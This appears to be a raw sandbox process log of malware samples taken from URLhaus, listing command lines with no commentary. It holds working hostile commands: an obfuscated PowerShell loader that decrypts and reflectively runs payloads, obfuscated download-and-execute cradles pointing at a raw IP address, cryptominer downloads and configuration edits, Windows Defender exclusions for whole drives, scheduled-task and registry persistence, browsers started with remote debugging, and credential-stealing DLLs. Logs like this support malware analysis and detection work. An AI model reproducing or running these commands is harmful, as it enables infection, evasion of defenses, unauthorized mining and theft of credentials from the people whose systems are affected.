C:\Windows\SYSTEM32\rundll32.exe

rundll32.exe "C:\ProgramData\AMMYY\aa_nts.dll",run

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe

"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe" /update "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe

"C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.exe" /delete "C:\Users\Admin\Downloads\UrlHausFiles\[UPG]CSS.new.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\Downloads\UrlHausFiles\System.exe

"C:\Users\Admin\Downloads\UrlHausFiles\System.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted.cmd"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted.cmd';$lAeq='GfZBCetCfZBCurfZBCrefZBCnfZBCtfZBCPrfZBCocfZBCefZBCsfZBCsfZBC'.Replace('fZBC', ''),'MaiPrpmnMoPrpmdPrpmulPrpmePrpm'.Replace('Prpm', ''),'CrIgJgeatIgJgeIgJgDeIgJgcIgJgryIgJgpIgJgtoIgJgrIgJg'.Replace('IgJg', ''),'EJqHmntJqHmrJqHmyPoJqHmintJqHm'.Replace('JqHm', ''),'EleDBwrmeDBwrntADBwrtDBwr'.Replace('DBwr', ''),'ChaFGFHnFGFHgFGFHeEFGFHxtFGFHeFGFHnsiFGFHonFGFH'.Replace('FGFH', ''),'TrFaEMansFaEMfoFaEMrmFaEMFinFaEMalBFaEMlFaEMockFaEM'.Replace('FaEM', ''),'IpACXnvpACXokpACXepACX'.Replace('pACX', ''),'Sssrbplissrbtssrb'.Replace('ssrb', ''),'DVGtReVGtRcomVGtRpreVGtRssVGtR'.Replace('VGtR', ''),'FroomPomBoomPasoomPe6oomP4SoomPtroomPingoomP'.Replace('oomP', ''),'ReaafWIdLafWIinafWIeafWIsafWI'.Replace('afWI', ''),'LIdMHoaIdMHdIdMH'.Replace('IdMH', ''),'CBGdXopBGdXyBGdXToBGdX'.Replace('BGdX', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($lAeq[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function PvrJj($TpxZW){$NbCzo=[System.Security.Cryptography.Aes]::Create();$NbCzo.Mode=[System.Security.Cryptography.CipherMode]::CBC;$NbCzo.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$NbCzo.Key=[System.Convert]::($lAeq[10])('wn6tmbO/rOORgxj74qEsSdU2WhE4KPXIqhTJPDz2aPY=');$NbCzo.IV=[System.Convert]::($lAeq[10])('gHqzXB7DsEnzxXPGoUcHcg==');$PddqI=$NbCzo.($lAeq[2])();$ySKdP=$PddqI.($lAeq[6])($TpxZW,0,$TpxZW.Length);$PddqI.Dispose();$NbCzo.Dispose();$ySKdP;}function rEEVf($TpxZW){$QUakK=New-Object System.IO.MemoryStream(,$TpxZW);$zUBgT=New-Object System.IO.MemoryStream;$PwRDy=New-Object System.IO.Compression.GZipStream($QUakK,[IO.Compression.CompressionMode]::($lAeq[9]));$PwRDy.($lAeq[13])($zUBgT);$PwRDy.Dispose();$QUakK.Dispose();$zUBgT.Dispose();$zUBgT.ToArray();}$lkrNY=[System.IO.File]::($lAeq[11])([Console]::Title);$aZZTu=rEEVf (PvrJj ([Convert]::($lAeq[10])([System.Linq.Enumerable]::($lAeq[4])($lkrNY, 5).Substring(2))));$cSjRs=rEEVf (PvrJj ([Convert]::($lAeq[10])([System.Linq.Enumerable]::($lAeq[4])($lkrNY, 6).Substring(2))));[System.Reflection.Assembly]::($lAeq[12])([byte[]]$cSjRs).($lAeq[3]).($lAeq[7])($null,$null);[System.Reflection.Assembly]::($lAeq[12])([byte[]]$aZZTu).($lAeq[3]).($lAeq[7])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Users\Admin\AppData\Local\Temp\._cache_System.exe

"C:\Users\Admin\AppData\Local\Temp\._cache_System.exe"

C:\ProgramData\Synaptics\Synaptics.exe

"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate

C:\Users\Admin\Downloads\UrlHausFiles\bp.exe

"C:\Users\Admin\Downloads\UrlHausFiles\bp.exe"

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAFIEGIECGCB" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_System.exe'

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_System.exe'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\c3pool7.bat" "

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Users\Admin\AppData\Roaming\wget.exe

wget "http://quanlyphongnet.com/net/run.exe" -O "run.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys', 'C:\Users\Admin\c3pool\WinRing0x64.sys')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe'

C:\Users\Admin\AppData\Roaming\wget.exe

wget "http://quanlyphongnet.com/net/run2.exe" -O "run2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json', 'C:\Users\Admin\c3pool\config.json')"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffe9bf0fd08,0x7ffe9bf0fd14,0x7ffe9bf0fd20

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1968 -ip 1968

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1976

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System.exe'

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations=is-enterprise-managed=no --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2092,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2068 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations=is-enterprise-managed=no --field-trial-handle=2016,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files\Google\Chrome\Application\131.0.6778.86\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\131.0.6778.86\elevation_service.exe"

C:\Users\Admin\AppData\Roaming\run.exe

run.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations=is-enterprise-managed=no --field-trial-handle=2372,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3264 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2240,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3400 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4044,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=4064 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4696,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=4728 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations=is-enterprise-managed=no --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4976,i,11115856599627285657,5872851182077280152,262144 --variations-seed-version --mojo-platform-channel-handle=3940 /prefetch:1

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5D59.tmp\5D5A.tmp\5D5B.bat C:\Users\Admin\AppData\Roaming\run.exe"

C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe

"C:\Users\Admin\Downloads\UrlHausFiles\idrB5Event.exe"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe', 'C:\Users\Admin\c3pool\xmrig.exe')"

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrator:(OI)(CI)F /t /c

C:\Windows\system32\icacls.exe

icacls "C:\ProgramData\GBClientApp\Wallpapers" /deny administrators:(OI)(CI)F /t /c

C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe

"C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 8700 -ip 8700

C:\Users\Admin\AppData\Local\Temp\Aplanogamete\IDRBackup.exe

"C:\Users\Admin\AppData\Local\Temp\Aplanogamete\IDRBackup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 8700 -s 536

C:\Users\Admin\Downloads\UrlHausFiles\c1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\c1.exe"

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe"

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe"

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNi4zNTIiIHNoZWxsX3ZlcnNpb249IjEuMy4zNi4zNTEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7MkYwOUQ0OUEtRDIyNC00NEU1LTk1NjAtQkI5NDQ2MDEyM0QwfSIgdXNlcmlkPSJ7OTQ1MjhCNDgtNDg1RC00NjM3LUEyNDItNjcwQzUzRkUzRjY0fSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezdDMjRFNERDLTc0MTUtNEM4Mi1CQUNGLTM4NTdEQ0FBODU3NX0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgcGh5c21lbW9yeT0iOCIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNDLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iIiBuZXh0dmVyc2lvbj0iMTMxLjAuNjc3OC44NiIgYXA9Ing2NC1zdGFibGUtc3RhdHNkZWZfMSIgbGFuZz0iemgtQ04iIGJyYW5kPSIiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSI1MiIgaWlkPSJ7REIyNEVERDMtOTkyMC01RDVGLUZCQkUtOEU3NDNGNzQ4NkMxfSIgY29ob3J0PSIxOmd1L2kxOToiIGNvaG9ydG5hbWU9IlN0YWJsZSBJbnN0YWxscyAmYW1wOyBWZXJzaW9uIFBpbnMiPjxldmVudCBldmVudHR5cGU9IjkiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjAiLz48ZXZlbnQgZXZlbnR0eXBlPSI1IiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iMSIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgZG93bmxvYWRlcj0iYml0cyIgdXJsPSJodHRwOi8vZWRnZWRsLm1lLmd2dDEuY29tL2VkZ2VkbC9yZWxlYXNlMi9jaHJvbWUvYWRtZ3hsdDRkNWM1cmN0bm96dzN3enBodzJ3cV8xMzEuMC42Nzc4Ljg2LzEzMS4wLjY3NzguODZfY2hyb21lX2luc3RhbGxlci5leGUiIGRvd25sb2FkZWQ9IjExNjExOTQwOCIgdG90YWw9IjExNjExOTQwOCIgZG93bmxvYWRfdGltZV9tcz0iMjMxODYiLz48ZXZlbnQgZXZlbnR0eXBlPSIxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIi8-PGV2ZW50IGV2ZW50dHlwZT0iNiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIvPjxldmVudCBldmVudHR5cGU9IjIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjE5NjcwNyIgc291cmNlX3VybF9pbmRleD0iMCIgdXBkYXRlX2NoZWNrX3RpbWVfbXM9Ijk4OSIgZG93bmxvYWRfdGltZV9tcz0iMjQ3NjAiIGRvd25sb2FkZWQ9IjExNjExOTQwOCIgdG90YWw9IjExNjExOTQwOCIgaW5zdGFsbF90aW1lX21zPSIzNzQxMSIvPjwvYXBwPjwvcmVxdWVzdD4

C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe

"C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateOnDemand.exe" -Embedding

C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ondemand

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --from-installer

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=131.0.6778.86 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe9bf0fd08,0x7ffe9bf0fd14,0x7ffe9bf0fd20

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe', 'C:\Users\Admin\c3pool\nssm.exe')"

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Admin\AppData\Roaming\System.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Downloads\UrlHausFiles\aaa.exe

"C:\Users\Admin\Downloads\UrlHausFiles\aaa.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im FLiNGTrainerUpdater.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "hostname | foreach { $_ -replace '[^a-zA-Z0-9]+', '_' }"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im FLiNGTrainer.exe

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Administrator\Desktop\Google Chrome.exe"

C:\Users\Admin\Downloads\UrlHausFiles\adm_atu.exe

"C:\Users\Admin\Downloads\UrlHausFiles\adm_atu.exe"

C:\Windows\system32\HOSTNAME.EXE

"C:\Windows\system32\HOSTNAME.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"url\": *\".*\",', '\"url\": \"auto.c3pool.org:80\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Windows\system32\attrib.exe

attrib -h "C:\Users\Administrator\Desktop\Coc Coc.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"user\": *\".*\",', '\"user\": \"\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Users\Admin\Downloads\UrlHausFiles\test26.exe

"C:\Users\Admin\Downloads\UrlHausFiles\test26.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffeaa5c46f8,0x7ffeaa5c4708,0x7ffeaa5c4718

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\10000110280\min1_Melted')

C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe

"C:\Users\Admin\Downloads\UrlHausFiles\caspol.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1324,2511817535852043756,16234768005361468078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 /prefetch:3

C:\Users\Admin\Downloads\UrlHausFiles\stail.exe

"C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"

C:\Users\Admin\AppData\Local\Temp\is-G2HRC.tmp\stail.tmp

"C:\Users\Admin\AppData\Local\Temp\is-G2HRC.tmp\stail.tmp" /SL5="$A0202,3886989,54272,C:\Users\Admin\Downloads\UrlHausFiles\stail.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" pause coder_media_11281

C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe

"C:\Users\Admin\AppData\Local\Coder Media 1.7.55\codermedia.exe" -i

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"pass\": *\".*\",', '\"pass\": \"Gumlnlfe\",' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

C:\Windows\System32\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\UrlHausFiles\Deccastationers.msi"

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 pause coder_media_11281

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "eBGamer45" -Value "C:\ProgramData\BridgeGamer\BridgeGamer.exe"

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "\Microsoft\Windows\Task Manager\Interactive" /F

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll, Main

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Windows\system32\config\systemprofile\AppData\Roaming\5114ae63d6bd6b\cred64.dll, Main

C:\Users\Admin\Downloads\UrlHausFiles\bin.exe

"C:\Users\Admin\Downloads\UrlHausFiles\bin.exe"

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Windows\SYSTEM32\wscript.exe

"wscript" C:\Users\Admin\AppData\Local\Temp\tempScript.js

C:\Windows\system32\schtasks.exe

SchTasks /Delete /TN "\Microsoft\Windows\USB\Usb-Notifications" /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 46102' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Windows\system32\config\systemprofile\AppData\Roaming\Network46102Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Users\Admin\AppData\Roaming\toolsync_RO\IDRBackup.exe

C:\Users\Admin\AppData\Roaming\toolsync_RO\IDRBackup.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://176.113.115.178/FF/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X

C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dmshell.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -Command "$out = gc 'C:\Users\Admin\c3pool\config.json' | foreach { $_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,' } | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\c3pool\config.json'"

